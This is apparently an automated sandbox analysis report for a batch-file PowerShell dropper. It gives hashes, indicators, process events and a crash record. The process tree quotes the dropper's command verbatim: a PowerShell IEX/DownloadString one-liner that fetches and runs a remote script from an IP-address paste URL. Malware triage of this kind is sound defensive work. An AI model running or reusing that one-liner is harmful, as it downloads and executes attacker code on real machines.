ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb

Analysis

Target

46MBBJZz.bat
Size

189B
MD5

c7b71aa9749be55225b17bbaf4b4b9a1
SHA1

ec46d8385341aa2152b70d834c898c5fd9c82284
SHA256

ca27de823967366e96e0623a33820b1713b1e19439c82d81fe6521e04da48dcb
SHA512

3c0c57b1384957bcf30d3c079c6fc7c4a48be99a2148490e078eaa1809dd87d2e5f047f457cc8c9f2e6518f5ef8177d73f739c27076f45ec5deae04be4590e8d

Score

10^/10

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/46MBBJZz

Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.

Processes:

description flow ioc

HTTP URL 4 http://www.msftconnecttest.com/connecttest.txt
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2172 1804 WerFault.exe powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

WerFault.exe

description pid process

Token: SeRestorePrivilege 2172 WerFault.exe
Token: SeBackupPrivilege 2172 WerFault.exe
Token: SeDebugPrivilege 2172 WerFault.exe

description	flow	ioc
HTTP URL	4	http://www.msftconnecttest.com/connecttest.txt

pid	pid_target	process	target process
2172	1804	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

Processes:

WerFault.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\46MBBJZz.bat"
1⤵
PID:1492

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/46MBBJZz');Invoke-ECMOWU;Start-Sleep -s 10000"
2⤵
PID:1804

memory/2172-0-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

Filesize
4KB

Download